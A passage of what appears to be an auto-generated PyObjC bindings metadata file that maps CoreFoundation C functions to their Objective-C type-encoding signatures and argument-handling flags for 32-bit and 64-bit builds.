b"@^{__CFAttributedString=}q^{__CFString=}{_CFRange=qq}^{_CFRange=qq}",
),
"",
{"arguments": {4: {"type_modifier": "o"}}},
),
"CFFileDescriptorGetContext": (
sel32or64(
b"v^{__CFFileDescriptor=}^{_CFFileDescriptorContext=l^v^?^?^?}",
b"v^{__CFFileDescriptor=}^{_CFFileDescriptorContext=q^v^?^?^?}",
),
),
"CFUserNotificationPopUpSelection": (sel32or64(b"Ll", b"Qq"),),
"CFStringConvertIANACharSetNameToEncoding": (
sel32or64(b"L^{__CFString=}", b"I^{__CFString=}"),
),
"CFDateFormatterGetTimeStyle": (
sel32or64(b"l^{__CFDateFormatter=}", b"q^{__CFDateFormatter=}"),
),
"CFSocketSetSocketFlags": (sel32or64(b"v^{__CFSocket=}L", b"v^{__CFSocket=}Q"),),
"CFXMLCreateStringByUnescapingEntities": (
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}^{__CFDictionary=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateWithSubstring": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}{_CFRange=ll}",
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}{_CFRange=qq}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFWriteStreamSetDispatchQueue": (
sel32or64(
b"v^{__CFWriteStream=}^{dispatch_queue_s=}", b"v^{__CFWriteStream=}@"
),
),
"CFStringCreateMutableCopy": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}l^{__CFString=}",
b"^{__CFString=}^{__CFAllocator=}q^{__CFString=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleCopyExecutableArchitectures": (
b"^{__CFArray=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFDictionaryCreateCopy": (
b"^{__CFDictionary=}^{__CFAllocator=}^{__CFDictionary=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopPerformBlock": (
b"v^{__CFRunLoop=}@@?",
"",
{
"arguments": {
2: {
"callable": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"^v"}},
},
"block": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"v"}},
},
}
}
},
),
"CFStringPad": (
sel32or64(
b"v^{__CFString=}^{__CFString=}ll", b"v^{__CFString=}^{__CFString=}qq"
),
),
"CFLocaleGetValue": (b"@^{__CFLocale=}^{__CFString=}",),
"CFLocaleCopyISOLanguageCodes": (
b"^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFSocketSendData": (
sel32or64(
b"l^{__CFSocket=}^{__CFData=}^{__CFData=}d",
b"q^{__CFSocket=}^{__CFData=}^{__CFData=}d",
),
),
"CFDataIncreaseLength": (sel32or64(b"v^{__CFData=}l", b"v^{__CFData=}q"),),
"CFBagGetValueIfPresent": (
b"Z^{__CFBag=}@^@",
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFBooleanGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBundleCopyAuxiliaryExecutableURL": (
b"^{__CFURL=}^{__CFBundle=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLEnumeratorCreateForMountedVolumes": (
sel32or64(
b"^{__CFURLEnumerator=}^{__CFAllocator=}L^{__CFArray=}",
b"^{__CFURLEnumerator=}^{__CFAllocator=}Q^{__CFArray=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFFileSecurityGetMode": (
b"Z^{__CFFileSecurity=}^S",
"",
{"arguments": {1: {"type_modifier": "o"}}},
),
"CFReadStreamSetClient": (
sel32or64(
b"Z^{__CFReadStream=}L^?^{_CFStreamClientContext=l^v^?^?^?}",
b"Z^{__CFReadStream=}Q^?^{_CFStreamClientContext=q^v^?^?^?}",
),
"",
{
"arguments": {
2: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFReadStream=}"},
1: {"type": b"Q"},
2: {"type": b"^v"},
},
}
}
}
},
),
"CFStringConvertEncodingToWindowsCodepage": (sel32or64(b"LL", b"II"),),
"CFMachPortGetInvalidationCallBack": (b"^?^{__CFMachPort=}",),
"CFURLCopyFileSystemPath": (
sel32or64(b"^{__CFString=}^{__CFURL=}l", b"^{__CFString=}^{__CFURL=}q"),
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopSourceSignal": (b"v^{__CFRunLoopSource=}",),
"CFBundleCopyInfoDictionaryInDirectory": (
b"^{__CFDictionary=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFUserNotificationDisplayAlert": (
sel32or64(
b"ldL^{__CFURL=}^{__CFURL=}^{__CFURL=}^{__CFString=}^{__CFString=}^{__CFString=}^{__CFString=}^{__CFString=}^L",
b"idQ^{__CFURL=}^{__CFURL=}^{__CFURL=}^{__CFString=}^{__CFString=}^{__CFString=}^{__CFString=}^{__CFString=}^Q",
),
"",
{"arguments": {10: {"type_modifier": "o"}}},
),
"CFURLClearResourcePropertyCacheForKey": (b"v^{__CFURL=}^{__CFString=}",),
"CFBinaryHeapGetMinimum": (b"@^{__CFBinaryHeap=}",),
"CFNotificationCenterAddObserver": (
sel32or64(
b"v^{__CFNotificationCenter=}@^?@@l", b"v^{__CFNotificationCenter=}@^?@@q"
),
"",
{
"arguments": {
2: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"@"},
1: {"type": b"@"},
2: {"type": b"@"},
3: {"type": b"@"},
4: {"type": b"@"},
},
}
}
}
},
),
"CFCalendarCopyTimeZone": (
b"^{__CFTimeZone=}^{__CFCalendar=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAttributedStringGetTypeID": (sel32or64(b"L", b"Q"),),
"CFPropertyListWriteToStream": (
sel32or64(
b"l@^{__CFWriteStream=}l^^{__CFString=}",
b"q@^{__CFWriteStream=}q^^{__CFString=}",
),
"",
{"arguments": {3: {"type_modifier": "o"}}},
),
"CFBagAddValue": (b"v^{__CFBag=}@",),
"CFCharacterSetCreateMutable": (
b"^{__CFCharacterSet=}^{__CFAllocator=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFTreeGetParent": (b"^{__CFTree=}^{__CFTree=}",),
"CFCalendarGetComponentDifference": (
sel32or64(b"Z^{__CFCalendar=}ddL^c", b"Z^{__CFCalendar=}ddQ^c"),
"",
{"variadic": True},
),
"CFURLGetByteRangeForComponent": (
sel32or64(
b"{_CFRange=ll}^{__CFURL=}l^{_CFRange=ll}",
b"{_CFRange=qq}^{__CFURL=}q^{_CFRange=qq}",
),
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFRunLoopRunInMode": (sel32or64(b"l^{__CFString=}dZ", b"i^{__CFString=}dZ"),),
"CFBundleCopyExecutableURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringReplace": (
sel32or64(
b"v^{__CFString=}{_CFRange=ll}^{__CFString=}",
b"v^{__CFString=}{_CFRange=qq}^{__CFString=}",
),
),
"CFSocketGetNative": (b"i^{__CFSocket=}",),
"CFConvertFloatSwappedToHost": (b"f{_CFSwappedFloat32=I}",),
"CFBundleOpenBundleResourceMap": (
sel32or64(b"s^{__CFBundle=}", b"i^{__CFBundle=}"),
),
"CFDataFind": (
sel32or64(
b"{_CFRange=ll}^{__CFData=}^{__CFData=}{_CFRange=ll}L",
b"{_CFRange=qq}^{__CFData=}^{__CFData=}{_CFRange=qq}Q",
),
),
"CFMachPortCreate": (
sel32or64(
b"^{__CFMachPort=}^{__CFAllocator=}^?^{_CFMachPortContext=l^v^?^?^?}^Z",
b"^{__CFMachPort=}^{__CFAllocator=}^?^{_CFMachPortContext=q^v^?^?^?}^Z",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFMachPort=}"},
1: {"type": b"^v"},
2: {"type": b"q"},
3: {"type": b"^v"},
},
}
}
},
},
),
"CFAttributedStringReplaceAttributedString": (
sel32or64(
b"v^{__CFAttributedString=}{_CFRange=ll}^{__CFAttributedString=}",
b"v^{__CFAttributedString=}{_CFRange=qq}^{__CFAttributedString=}",
),
),
"CFTimeZoneCreateWithName": (
b"^{__CFTimeZone=}^{__CFAllocator=}^{__CFString=}Z",
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleGetPackageInfoInDirectory": (
sel32or64(b"Z^{__CFURL=}^L^L", b"Z^{__CFURL=}^I^I"),
"",
{"arguments": {1: {"type_modifier": "o"}, 2: {"type_modifier": "o"}}},
),
"CFURLCreateData": (
sel32or64(
b"^{__CFData=}^{__CFAllocator=}^{__CFURL=}LZ",
b"^{__CFData=}^{__CFAllocator=}^{__CFURL=}IZ",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFNumberFormatterCreateStringWithNumber": (
b"^{__CFString=}^{__CFAllocator=}^{__CFNumberFormatter=}^{__CFNumber=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCalendarGetMaximumRangeOfUnit": (
sel32or64(b"{_CFRange=ll}^{__CFCalendar=}L", b"{_CFRange=qq}^{__CFCalendar=}Q"),
),
"CFRunLoopRemoveSource": (b"v^{__CFRunLoop=}^{__CFRunLoopSource=}^{__CFString=}",),
"CFSwapInt32": (b"II",),
"CFXMLParserCreateWithDataFromURL": (
sel32or64(
b"^{__CFXMLParser=}^{__CFAllocator=}^{__CFURL=}Ll^{_CFXMLParserCallBacks=l^?^?^?^?^?}^{_CFXMLParserContext=l^v^?^?^?}",
b"^{__CFXMLParser=}^{__CFAllocator=}^{__CFURL=}Qq^{_CFXMLParserCallBacks=q^?^?^?^?^?}^{_CFXMLParserContext=q^v^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopTimerGetNextFireDate": (b"d^{__CFRunLoopTimer=}",),
"CFBitVectorGetCountOfBit": (
sel32or64(
b"l^{__CFBitVector=}{_CFRange=ll}L", b"q^{__CFBitVector=}{_CFRange=qq}I"
),
),
"CFNotificationCenterGetDarwinNotifyCenter": (b"^{__CFNotificationCenter=}",),
"CFPropertyListWrite": (
sel32or64(
b"l@^{__CFWriteStream=}lL^^{__CFError=}",
b"q@^{__CFWriteStream=}qQ^^{__CFError=}",
),
"",
{
"arguments": {
4: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
}
},
),
"CFDataAppendBytes": (
sel32or64(b"v^{__CFData=}^vl", b"v^{__CFData=}^vq"),
"",
{"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}}},
),
"CFDictionaryGetCount": (
sel32or64(b"l^{__CFDictionary=}", b"q^{__CFDictionary=}"),
),
"CFLocaleCreateLocaleIdentifierFromWindowsLocaleCode": (
b"^{__CFString=}^{__CFAllocator=}I",
"",
{"retval": {"already_cfretained": True}},
),
"CFUserNotificationUpdate": (
sel32or64(
b"l^{__CFUserNotification=}dL^{__CFDictionary=}",
b"i^{__CFUserNotification=}dQ^{__CFDictionary=}",
),
),
"CFMessagePortInvalidate": (b"v^{__CFMessagePort=}",),
"CFSwapInt64": (b"QQ",),
"CFURLCreateWithFileSystemPath": (
sel32or64(
b"^{__CFURL=}^{__CFAllocator=}^{__CFString=}lZ",
b"^{__CFURL=}^{__CFAllocator=}^{__CFString=}qZ",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFAttributedStringGetAttributes": (
sel32or64(
b"^{__CFDictionary=}^{__CFAttributedString=}l^{_CFRange=ll}",
b"^{__CFDictionary=}^{__CFAttributedString=}q^{_CFRange=qq}",
),
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFSocketSetDefaultNameRegistryPortNumber": (b"vS",),
"CFFileSecurityGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBundleCopyResourceURLsOfType": (
b"^{__CFArray=}^{__CFBundle=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFConvertFloat32SwappedToHost": (b"f{_CFSwappedFloat32=I}",),
"CFDictionaryReplaceValue": (b"v^{__CFDictionary=}@@",),
"CFXMLTreeCreateFromDataWithError": (
sel32or64(
b"^{__CFTree=}^{__CFAllocator=}^{__CFData=}^{__CFURL=}Ll^^{__CFDictionary=}",
b"^{__CFTree=}^{__CFAllocator=}^{__CFData=}^{__CFURL=}Qq^^{__CFDictionary=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {5: {"type_modifier": "o"}},
},
),
"CFTimeZoneSetDefault": (b"v^{__CFTimeZone=}",),
"CFArrayApplyFunction": (
sel32or64(b"v^{__CFArray=}{_CFRange=ll}^?@", b"v^{__CFArray=}{_CFRange=qq}^?@"),
"",
{
"arguments": {
2: {
"callable": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"@"}, 1: {"type": b"@"}},
},
"callable_retained": False,
}
}
},
),
"CFMessagePortGetInvalidationCallBack": (
b"^?^{__CFMessagePort=}",
"",
{
"retval": {
"callable": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"@"}, 1: {"type": b"^v"}},
}
}
},
),
"CFUserNotificationGetResponseDictionary": (
b"^{__CFDictionary=}^{__CFUserNotification=}",
),
"CFSwapInt32HostToLittle": (b"II",),
"CFSocketInvalidate": (b"v^{__CFSocket=}",),
"CFStringGetMostCompatibleMacStringEncoding": (sel32or64(b"LL", b"II"),),
"CFRunLoopObserverIsValid": (b"Z^{__CFRunLoopObserver=}",),
"CFStringInsert": (
sel32or64(b"v^{__CFString=}l^{__CFString=}", b"v^{__CFString=}q^{__CFString=}"),
),
"CFXMLParserGetTypeID": (sel32or64(b"L", b"Q"),),
"CFMessagePortGetContext": (
sel32or64(
b"v^{__CFMessagePort=}^{_CFMessagePortContext=l^v^?^?^?}",
b"v^{__CFMessagePort=}^{_CFMessagePortContext=q^v^?^?^?}",
),
),
"CFStringIsEncodingAvailable": (sel32or64(b"ZL", b"ZI"),),
"CFStringGetLength": (sel32or64(b"l^{__CFString=}", b"q^{__CFString=}"),),
"CFURLCanBeDecomposed": (b"Z^{__CFURL=}",),
"CFStringCreateWithCStringNoCopy": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^tL^{__CFAllocator=}",
b"^{__CFString=}^{__CFAllocator=}^tI^{__CFAllocator=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}},
},
),
"CFReadStreamClose": (b"v^{__CFReadStream=}",),
"CFBagCreate": (
sel32or64(
b"^{__CFBag=}^{__CFAllocator=}^^vl^{_CFBagCallBacks=l^?^?^?^?^?}",
b"^{__CFBag=}^{__CFAllocator=}^^vq^{_CFBagCallBacks=q^?^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopAddTimer": (b"v^{__CFRunLoop=}^{__CFRunLoopTimer=}^{__CFString=}",),
"CFDictionaryGetValueIfPresent": (
b"Z^{__CFDictionary=}@^@",
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFArrayCreateCopy": (
b"^{__CFArray=}^{__CFAllocator=}^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorGetLastIndexOfBit": (
sel32or64(
b"l^{__CFBitVector=}{_CFRange=ll}L", b"q^{__CFBitVector=}{_CFRange=qq}I"
),
),
"CFDataCreateMutable": (
sel32or64(b"^{__CFData=}^{__CFAllocator=}l", b"^{__CFData=}^{__CFAllocator=}q"),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringAppendCString": (
sel32or64(b"v^{__CFString=}^tL", b"v^{__CFString=}^tI"),
"",
{"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}}},
),
"CFLocaleGetIdentifier": (b"^{__CFString=}^{__CFLocale=}",),
"CFStringConvertWindowsCodepageToEncoding": (sel32or64(b"LL", b"II"),),
"CFTreeRemove": (b"v^{__CFTree=}",),
"CFBundleCloseBundleResourceMap": (
sel32or64(b"v^{__CFBundle=}s", b"v^{__CFBundle=}i"),
),
"CFStreamCreateBoundPair": (
sel32or64(
b"v^{__CFAllocator=}^^{__CFReadStream=}^^{__CFWriteStream=}l",
b"v^{__CFAllocator=}^^{__CFReadStream=}^^{__CFWriteStream=}q",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"type_modifier": "o"}, 2: {"type_modifier": "o"}},
},
),
"CFRunLoopTimerSetNextFireDate": (b"v^{__CFRunLoopTimer=}d",),
"CFAllocatorSetDefault": (b"v^{__CFAllocator=}",),
"CFPreferencesSetAppValue": (b"v^{__CFString=}@^{__CFString=}",),
"CFTimeZoneGetNextDaylightSavingTimeTransition": (b"d^{__CFTimeZone=}d",),
"CFDateFormatterGetFormat": (b"^{__CFString=}^{__CFDateFormatter=}",),
"CFLocaleCreateLocaleIdentifierFromComponents": (
b"^{__CFString=}^{__CFAllocator=}^{__CFDictionary=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFPreferencesSynchronize": (b"Z^{__CFString=}^{__CFString=}^{__CFString=}",),
"CFReadStreamCopyDispatchQueue": (
sel32or64(b"^{dispatch_queue_s=}^{__CFReadStream=}", b"@^{__CFReadStream=}"),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetMaximumSizeOfFileSystemRepresentation": (
sel32or64(b"l^{__CFString=}", b"q^{__CFString=}"),
),
"CFBundleCreate": (
b"^{__CFBundle=}^{__CFAllocator=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLGetPortNumber": (sel32or64(b"l^{__CFURL=}", b"i^{__CFURL=}"),),
"CFStringAppendCharacters": (
sel32or64(b"v^{__CFString=}^Tl", b"v^{__CFString=}^Tq"),
"",
{"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}}},
),
"CFArrayGetLastIndexOfValue": (
sel32or64(b"l^{__CFArray=}{_CFRange=ll}@", b"q^{__CFArray=}{_CFRange=qq}@"),
),
"CFRunLoopTimerCreate": (
sel32or64(
b"^{__CFRunLoopTimer=}^{__CFAllocator=}ddLl^?^{_CFRunLoopTimerContext=l^v^?^?^?}",
b"^{__CFRunLoopTimer=}^{__CFAllocator=}ddQq^?^{_CFRunLoopTimerContext=q^v^?^?^?}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
5: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFRunLoopTimer=}"},
1: {"type": b"^v"},
},
}
}
},
},
),
"CFLocaleCreate": (
b"^{__CFLocale=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringHasSuffix": (b"Z^{__CFString=}^{__CFString=}",),
"CFEqual": (b"Z@@",),
"CFRunLoopGetNextTimerFireDate": (b"d^{__CFRunLoop=}^{__CFString=}",),
"CFErrorCreate": (
sel32or64(
b"^{__CFError=}^{__CFAllocator=}^{__CFString=}l^{__CFDictionary=}",
b"^{__CFError=}^{__CFAllocator=}^{__CFString=}q^{__CFDictionary=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateByCombiningStrings": (
b"^{__CFString=}^{__CFAllocator=}^{__CFArray=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateWithFileSystemRepresentation": (
b"^{__CFString=}^{__CFAllocator=}^t",
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}},
},
),
"CFBundleGetPlugIn": (b"^{__CFBundle=}^{__CFBundle=}",),
"CFAllocatorGetPreferredSizeForSize": (
sel32or64(b"l^{__CFAllocator=}lL", b"q^{__CFAllocator=}qQ"),
),
"CFDateFormatterSetFormat": (b"v^{__CFDateFormatter=}^{__CFString=}",),
"CFBinaryHeapApplyFunction": (
b"v^{__CFBinaryHeap=}^?@",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"@"}, 1: {"type": b"@"}},
},
"callable_retained": False,
}
}
},
),
"CFRunLoopTimerSetTolerance": (b"v^{__CFRunLoopTimer=}d",),
"CFStringGetBytes": (
sel32or64(
b"l^{__CFString=}{_CFRange=ll}LCZ^tl^l",
b"q^{__CFString=}{_CFRange=qq}ICZ^tq^q",
),
"",
{
"arguments": {
5: {"c_array_length_in_arg": (6, 7), "type_modifier": "o"},
7: {"type_modifier": "o"},
}
},
),
"CFLocaleCopyAvailableLocaleIdentifiers": (
b"^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateArrayBySeparatingStrings": (
b"^{__CFArray=}^{__CFAllocator=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetDoubleValue": (b"d^{__CFString=}",),
"CFStringCreateMutable": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}l", b"^{__CFString=}^{__CFAllocator=}q"
),
"",
{"retval": {"already_cfretained": True}},
),
"CFSetGetCount": (sel32or64(b"l^{__CFSet=}", b"q^{__CFSet=}"),),
"CFURLCreateWithBytes": (
sel32or64(
b"^{__CFURL=}^{__CFAllocator=}^vlL^{__CFURL=}",
b"^{__CFURL=}^{__CFAllocator=}^vqI^{__CFURL=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFStringCompareWithOptionsAndLocale": (
sel32or64(
b"l^{__CFString=}^{__CFString=}{_CFRange=ll}L^{__CFLocale=}",
b"q^{__CFString=}^{__CFString=}{_CFRange=qq}Q^{__CFLocale=}",
),
),
"CFPropertyListCreateFromStream": (
sel32or64(
b"@^{__CFAllocator=}^{__CFReadStream=}lL^l^^{__CFString=}",
b"@^{__CFAllocator=}^{__CFReadStream=}qQ^q^^{__CFString=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {4: {"type_modifier": "o"}, 5: {"type_modifier": "o"}},
},
),
"CFAbsoluteTimeAddGregorianUnits": (
sel32or64(
b"dd^{__CFTimeZone=}{_CFGregorianUnits=llllld}",
b"dd^{__CFTimeZone=}{_CFGregorianUnits=iiiiid}",
),
),
"CFLocaleCopyCurrent": (
b"^{__CFLocale=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFDateFormatterGetLocale": (b"^{__CFLocale=}^{__CFDateFormatter=}",),
"CFURLEnumeratorGetSourceDidChange": (b"Z^{__CFURLEnumerator=}",),
"CFNullGetTypeID": (sel32or64(b"L", b"Q"),),
"CFStringUppercase": (b"v^{__CFString=}^{__CFLocale=}",),
"CFTreeGetFirstChild": (b"^{__CFTree=}^{__CFTree=}",),
"CFAbsoluteTimeGetDayOfYear": (
sel32or64(b"ld^{__CFTimeZone=}", b"id^{__CFTimeZone=}"),
),
"CFURLCreateFromFileSystemRepresentation": (
sel32or64(
b"^{__CFURL=}^{__CFAllocator=}^tlZ", b"^{__CFURL=}^{__CFAllocator=}^tqZ"
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}},
},
),
"CFBundleGetInfoDictionary": (b"^{__CFDictionary=}^{__CFBundle=}",),
"CFByteOrderGetCurrent": (sel32or64(b"l", b"q"),),
"CFAttributedStringEndEditing": (b"v^{__CFAttributedString=}",),
"CFUserNotificationCancel": (
sel32or64(b"l^{__CFUserNotification=}", b"i^{__CFUserNotification=}"),
),
"CFUserNotificationSecureTextField": (sel32or64(b"Ll", b"Qq"),),
"CFBitVectorCreate": (
sel32or64(
b"^{__CFBitVector=}^{__CFAllocator=}^Cl",
b"^{__CFBitVector=}^{__CFAllocator=}^Cq",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
1: {"c_array_of_variable_length": True, "type_modifier": "n"}
},
},
),
"CFCharacterSetRemoveCharactersInRange": (
sel32or64(
b"v^{__CFCharacterSet=}{_CFRange=ll}", b"v^{__CFCharacterSet=}{_CFRange=qq}"
),
),
"CFMachPortSetInvalidationCallBack": (
b"v^{__CFMachPort=}^?",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFMachPort=}"},
1: {"type": b"^v"},
},
}
}
}
},
),
"CFCharacterSetAddCharactersInString": (b"v^{__CFCharacterSet=}^{__CFString=}",),
"CFBitVectorGetBitAtIndex": (
sel32or64(b"L^{__CFBitVector=}l", b"I^{__CFBitVector=}q"),
),
"CFURLIsFileReferenceURL": (b"Z^{__CFURL=}",),
"CFURLCopyPath": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFArrayGetFirstIndexOfValue": (
sel32or64(b"l^{__CFArray=}{_CFRange=ll}@", b"q^{__CFArray=}{_CFRange=qq}@"),
),
"CFCharacterSetCreateWithCharactersInRange": (
sel32or64(
b"^{__CFCharacterSet=}^{__CFAllocator=}{_CFRange=ll}",
b"^{__CFCharacterSet=}^{__CFAllocator=}{_CFRange=qq}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetIsLongCharacterMember": (
sel32or64(b"Z^{__CFCharacterSet=}L", b"Z^{__CFCharacterSet=}I"),
),
"CFUUIDCreateFromUUIDBytes": (
b"^{__CFUUID=}^{__CFAllocator=}{_CFUUIDBytes=CCCCCCCCCCCCCCCC}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopAddSource": (b"v^{__CFRunLoop=}^{__CFRunLoopSource=}^{__CFString=}",),
"CFDictionaryContainsValue": (b"Z^{__CFDictionary=}@",),
"CFTimeZoneCopyKnownNames": (
b"^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleCopyPreferredLocalizationsFromArray": (
b"^{__CFArray=}^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorFlipBitAtIndex": (
sel32or64(b"v^{__CFBitVector=}l", b"v^{__CFBitVector=}q"),
),
"CFPropertyListCreateXMLData": (
b"^{__CFData=}^{__CFAllocator=}@",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCreateResourcePropertyForKeyFromBookmarkData": (
b"@^{__CFAllocator=}^{__CFString=}^{__CFData=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFDateGetAbsoluteTime": (b"d^{__CFDate=}",),
"CFNumberIsFloatType": (b"Z^{__CFNumber=}",),
"CFTreePrependChild": (b"v^{__CFTree=}^{__CFTree=}",),
"CFRunLoopWakeUp": (b"v^{__CFRunLoop=}",),
"CFDateFormatterCreateStringWithDate": (
b"^{__CFString=}^{__CFAllocator=}^{__CFDateFormatter=}^{__CFDate=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetHasMemberInPlane": (
sel32or64(b"Z^{__CFCharacterSet=}l", b"Z^{__CFCharacterSet=}q"),
),
"CFURLCopyResourceSpecifier": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringFold": (
sel32or64(b"v^{__CFString=}L^{__CFLocale=}", b"v^{__CFString=}Q^{__CFLocale=}"),
),
"CFStringTokenizerCopyCurrentTokenAttribute": (
sel32or64(b"@^{__CFStringTokenizer=}L", b"@^{__CFStringTokenizer=}Q"),
"",
{"retval": {"already_cfretained": True}},
),
"CFNotificationCenterRemoveEveryObserver": (b"v^{__CFNotificationCenter=}@",),
"CFMessagePortGetName": (b"^{__CFString=}^{__CFMessagePort=}",),
"CFURLCopyPassword": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFWriteStreamClose": (b"v^{__CFWriteStream=}",),
"CFMessagePortCreateRunLoopSource": (
sel32or64(
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFMessagePort=}l",
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFMessagePort=}q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetCString": (
sel32or64(b"Z^{__CFString=}^tlL", b"Z^{__CFString=}^tqI"),
"",
{"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "o"}}},
),
"_CFAutoreleasePoolPrintPools": (b"v",),
"CFPropertyListCreateData": (
sel32or64(
b"^{__CFData=}^{__CFAllocator=}@lL^^{__CFError=}",
b"^{__CFData=}^{__CFAllocator=}@qQ^^{__CFError=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
4: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
},
},
),
"CFURLCopyQueryString": (
b"^{__CFString=}^{__CFURL=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopTimerCreateWithHandler": (
sel32or64(
b"^{__CFRunLoopTimer=}^{__CFAllocator=}ddLl@?",
b"^{__CFRunLoopTimer=}^{__CFAllocator=}ddQq@?",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
5: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^v"},
1: {"type": b"^{__CFRunLoopTimer=}"},
},
},
"block": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"^{__CFRunLoopTimer=}"}},
},
}
},
},
),
"CFTimeZoneCopyAbbreviationDictionary": (
b"^{__CFDictionary=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringConvertEncodingToIANACharSetName": (
sel32or64(b"^{__CFString=}L", b"^{__CFString=}I"),
),
"CFSwapInt16LittleToHost": (b"SS",),
"CFNumberFormatterSetProperty": (b"v^{__CFNumberFormatter=}^{__CFString=}@",),
"CFSocketCopyPeerAddress": (
b"^{__CFData=}^{__CFSocket=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCreateFromFileSystemRepresentationRelativeToBase": (
sel32or64(
b"^{__CFURL=}^{__CFAllocator=}^tlZ^{__CFURL=}",
b"^{__CFURL=}^{__CFAllocator=}^tqZ^{__CFURL=}",
),
"",
{
"retval": {"already_cfretained": True},
